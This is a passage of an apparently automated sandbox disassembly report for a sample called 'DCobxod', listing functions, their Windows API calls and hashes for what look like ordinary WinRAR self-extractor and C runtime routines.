                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042B610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0042B637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0042B650
                                                              • SetWindowTextW.USER32(?,?), ref: 0042B661
                                                              • GetDlgItem.USER32(?,00000065), ref: 0042B66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0042B67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0042B694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: dc5b0bda7bf43c07f5b7f4dfea035eaec30d2b520660e3e14663c47cc510459a
                                                              • Instruction ID: d1debd91b7403aac58386f111450831b4a5554bd9260b57bf1e0f5026f55ce01
                                                              • Opcode Fuzzy Hash: dc5b0bda7bf43c07f5b7f4dfea035eaec30d2b520660e3e14663c47cc510459a
                                                              • Instruction Fuzzy Hash: 2B213731300225BBD2115F66FC4AF3B3B6CFB0AB46F41402AF644E25A0DB5A9941A67F
                                                              Function 0042FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,5A73DC7F,00000001,00000000,00000000,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FE1F
                                                              • _com_issue_error.COMSUPP ref: 0042FE48
                                                              • _com_issue_error.COMSUPP ref: 0042FE52
                                                              • GetLastError.KERNEL32(80070057,5A73DC7F,00000001,00000000,00000000,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FE57
                                                              • _com_issue_error.COMSUPP ref: 0042FE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,0041AF6C,ROOT\CIMV2), ref: 0042FE80
                                                              • _com_issue_error.COMSUPP ref: 0042FE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: 92f001e1eac0acedcee539643282def6eeb2af89fbcbb26f56ae3645bfea6afe
                                                              • Instruction ID: 605268864e73a33559c16802a5edc850e9d2f069104a7d8ab91605f78c86c352
                                                              • Opcode Fuzzy Hash: 92f001e1eac0acedcee539643282def6eeb2af89fbcbb26f56ae3645bfea6afe
                                                              • Instruction Fuzzy Hash: AA411871B00224ABDB109F65E845BAFBBB8EB48B15F90423FF805E7351D778990487A9
                                                              Function 00419382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00419387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004193AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004193C9
                                                                • Part of subcall function 0041C29A: _wcslen.LIBCMT ref: 0041C2A2
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              • _swprintf.LIBCMT ref: 00419465
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 004194D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00419514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 4576f4473a50ee170e2ef6b3456737ae1a1e5d294dc1261cf3a80961af3e9f6a
                                                              • Instruction ID: d15d7e826787053e74919245c502bc2b281cbce191fd2181e5dabcf051274173
                                                              • Opcode Fuzzy Hash: 4576f4473a50ee170e2ef6b3456737ae1a1e5d294dc1261cf3a80961af3e9f6a
                                                              • Instruction Fuzzy Hash: 5641937290026476DF21ABA1DD55EDF737DAF45344F0048ABF609A3152EA3C8FC98B68
                                                              Function 00411100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: UB$pB$zB
                                                              • API String ID: 176396367-2224578637
                                                              • Opcode ID: 99485401b52263a647973af0a325941614321a3c478c7b808cb6c98ca9fdccb9
                                                              • Instruction ID: 19a45458a792b82d1eb484b032067d2225a2e0ff9439eaeeb2ba85b604a5b917
                                                              • Opcode Fuzzy Hash: 99485401b52263a647973af0a325941614321a3c478c7b808cb6c98ca9fdccb9
                                                              • Instruction Fuzzy Hash: E941B671A006695BCB119F68CC069EF7BB8EF05311F00006EFD45F7256DB38AE858BA9
                                                              Function 00429ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00429EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00429F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00429FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00429FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00429FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: B$RarHtmlClassName
                                                              • API String ID: 3937224194-998244635
                                                              • Opcode ID: 9b2af4449d39cb94bd47ef48233de839994f88e0200d0c33bbbd3abbe46141e7
                                                              • Instruction ID: 78eaeb5ba42b4ea2556ec1ac782febcfc104612366c118915c5a1721241e57c2
                                                              • Opcode Fuzzy Hash: 9b2af4449d39cb94bd47ef48233de839994f88e0200d0c33bbbd3abbe46141e7
                                                              • Instruction Fuzzy Hash: 0441E331104220EFCB215F65EC48B1B7BA8FF48706F40456AFD4999156CB38DD54DB6E
                                                              Function 00421218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 0042122E
                                                                • Part of subcall function 0041B146: GetVersionExW.KERNEL32(?), ref: 0041B16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00421251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00421263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00421274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004212CF
                                                              • __aullrem.LIBCMT ref: 00421379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: ea41c739f2ac4e67bf221c54799f83552b60710f1519aae8f4ce4d277e77f2cf
                                                              • Instruction ID: b7643b326dfca128e1cc592c6e3714db9c4cd1e2893d38a0759f52ba4d045a28
                                                              • Opcode Fuzzy Hash: ea41c739f2ac4e67bf221c54799f83552b60710f1519aae8f4ce4d277e77f2cf
                                                              • Instruction Fuzzy Hash: 1B4168B5508315AFC710DF65D88096BBBF9FF88714F40892EF996C2610E738E609CB66
                                                              Function 00412210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00412536
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: 13d47e927f5338ff37c07eb247c6890797a038319433802208ac98103fb067dc
                                                              • Instruction ID: 9ddccd6e699431901eabc4af13ee2588fcf9f4a8653d8a960a67efddf219d392
                                                              • Opcode Fuzzy Hash: 13d47e927f5338ff37c07eb247c6890797a038319433802208ac98103fb067dc
                                                              • Instruction Fuzzy Hash: A9F138706042409BCB25EB25CAD5BEE77955B90304F08056FEC86DB383DBAC9DC587AA
                                                              Function 00429CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 5b41d6a9bdc9998025aeacd763f43a3a996147226d0df449cfe81908d3eeda93
                                                              • Instruction ID: 7b482cf3d20cb5f1441dd577330cb7f994639dc48e60f6d15e2925300001dd37
                                                              • Opcode Fuzzy Hash: 5b41d6a9bdc9998025aeacd763f43a3a996147226d0df449cfe81908d3eeda93
                                                              • Instruction Fuzzy Hash: 9751D66675133295DB309A25B8117B773A0DFA1750FEA042BF9818B3C0FB6D8C81926D
                                                              Function 0043F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0043FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0043F6CF
                                                              • __fassign.LIBCMT ref: 0043F74A
                                                              • __fassign.LIBCMT ref: 0043F765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0043F78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,0043FE02,00000000,?,?,?,?,?,?,?,?,?,0043FE02,00000000), ref: 0043F7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,0043FE02,00000000,?,?,?,?,?,?,?,?,?,0043FE02,00000000), ref: 0043F7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: b0ce387c4b58114902f065e82731e68ceeaae6aabb12f21b1ca03c32b818d7ef
                                                              • Instruction ID: 51a40a4bdabc8c1af7cf3aa91ec0eb96bd76c2e5bde02ba668b53b647943e1b9
                                                              • Opcode Fuzzy Hash: b0ce387c4b58114902f065e82731e68ceeaae6aabb12f21b1ca03c32b818d7ef
                                                              • Instruction Fuzzy Hash: 7F51B2B5D00209AFCB14CFA8DC81AEEBBF4EF0D300F14516AE955E7251D774AA45CBA8
                                                              Function 0042CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0042CE9D
                                                                • Part of subcall function 0041B690: _wcslen.LIBCMT ref: 0041B696
                                                              • _swprintf.LIBCMT ref: 0042CED1
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • SetDlgItemTextW.USER32(?,00000066,0045946A), ref: 0042CEF1
                                                              • _wcschr.LIBVCRUNTIME ref: 0042CF22
                                                              • EndDialog.USER32(?,00000001), ref: 0042CFFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 689974011-1360425832
                                                              • Opcode ID: aff505bc583da443a19f527541d79fdc8d67631dc1dfa24c1bfe755a7a33d6a0
                                                              • Instruction ID: 98fa930ca1403de31404205fd286bc29081793dfe6e026be5e755a8ce2ac25a1
                                                              • Opcode Fuzzy Hash: aff505bc583da443a19f527541d79fdc8d67631dc1dfa24c1bfe755a7a33d6a0
                                                              • Instruction Fuzzy Hash: 8A416471A00268AADF21DB50DC85BEE77BCEB05345F8080A7F909E7151EA789E44CF69
                                                              Function 00432900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00432937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0043293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 004329C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004329F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 00432A48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 535933a68a31f37cb438c88139474660aa8a7bc38736e6dbe458ce155981d1f2
                                                              • Instruction ID: 772597e45a54899a2209e3f966bb38e91f1ddff45e09c2e1f110bf6e20b5f0b3
                                                              • Opcode Fuzzy Hash: 535933a68a31f37cb438c88139474660aa8a7bc38736e6dbe458ce155981d1f2
                                                              • Instruction Fuzzy Hash: EC41F974A00218AFCF10EF29C880B9EBBB0BF48324F149057E8156B392C7B9DA05CB95
                                                              Function 00429955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 575bc9ceb7f15b1dc1621cbb7563bec2ef3bea25fb1cda0a4393ad44a68a8235
                                                              • Instruction ID: e835a8c215b35ad694d76d5cb7228d49c9047f66f87a44e887d138fe259faaf2
                                                              • Opcode Fuzzy Hash: 575bc9ceb7f15b1dc1621cbb7563bec2ef3bea25fb1cda0a4393ad44a68a8235
                                                              • Instruction Fuzzy Hash: 98314E6274439566E634AF55BC4377BB3A4EB90320FA0841FF48557380FA5CAD8183AD
                                                              Function 0043C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0043C868: _free.LIBCMT ref: 0043C891
                                                              • _free.LIBCMT ref: 0043C8F2
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 0043C8FD
                                                              • _free.LIBCMT ref: 0043C908
                                                              • _free.LIBCMT ref: 0043C95C
                                                              • _free.LIBCMT ref: 0043C967
                                                              • _free.LIBCMT ref: 0043C972
                                                              • _free.LIBCMT ref: 0043C97D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: eccb0df0088146588839a7ad01c05d87565d7e7e596d089e85605e738dcf6c34
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: C8114272580704A6E520B772CC47FCBBBAC9F18B09F401C1EB39D76092DA69B6158754
                                                              Function 0042E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0042E669,0042E5CC,0042E86D), ref: 0042E605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0042E61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0042E630
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
